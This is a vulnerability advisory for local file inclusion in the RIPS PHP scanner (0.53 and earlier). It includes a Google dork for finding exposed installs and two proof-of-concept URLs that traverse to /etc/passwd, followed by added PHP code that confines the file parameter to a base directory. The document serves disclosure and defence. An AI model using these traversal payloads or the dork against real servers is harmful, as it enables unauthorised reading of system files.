# RIPS <= 0.53 Multiple Local File Inclusion Vulnerabilities
# Google Dork: allintitle: "RIPS - A static source code analyser for vulnerabilities in PHP scripts"
# Although this script is not intended to be accessible from the internet, there are some websites that host it.
# Download: http://sourceforge.net/projects/rips-scanner/
# Date: 23/03/12
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar

File: /windows/code.php
=======================

102: file $lines = file($file);
96: $file = $_GET['file'];

PoC: http://localhost/rips/windows/code.php?file=../../../../../../etc/passwd

File: /windows/function.php
===========================

64: file $lines = file($file);
58: $file = $_GET['file'];

PoC: http://localhost/rips/windows/function.php?file=../../../../../../etc/passwd
(will read the first line of the file)
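
Added example (not part of the original advisory and not the RIPS project's own fix): one way to canonicalise and confine the `file` parameter before it reaches `file()` in code.php and function.php. The function name `resolve_inside`, the demo directory and the assumption that the viewer only needs files under one scanned project directory are hypothetical.

```php
<?php
// Added example, not RIPS code. resolve_inside() and $base are hypothetical names.

/**
 * Resolve a user-supplied path and return it only if it is a regular file
 * located inside $baseDir. Returns null otherwise.
 */
function resolve_inside(string $baseDir, string $userPath): ?string
{
    // Reject empty input and NUL bytes (older PHP versions truncated paths at them).
    if ($userPath === '' || strpos($userPath, "\0") !== false) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }

    // realpath() collapses "../" sequences and follows symlinks, so the
    // prefix comparison below is made on the canonical location.
    $target = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($target === false || !is_file($target)) {
        return null;
    }

    // The trailing separator stops /srv/app from matching /srv/app-secret.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demo: a temporary directory stands in for the scanned project.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rips_demo_' . getmypid();
@mkdir($base . DIRECTORY_SEPARATOR . 'src', 0700, true);
file_put_contents($base . '/src/index.php', "<?php echo 'hi';\n");

$requests = ['src/index.php', '../../../../../../etc/passwd', 'src/../../outside'];
foreach ($requests as $req) {
    // In code.php / function.php this check would sit between
    // $file = $_GET['file'] and $lines = file($file).
    $safe = resolve_inside($base, $req);
    printf("%-32s => %s\n", $req, $safe === null ? 'rejected' : 'allowed');
}
```

Since the tool is not meant to be reachable from the internet, restricting access to it at the web server remains the first control; the check above limits what a permitted user can read through the viewer.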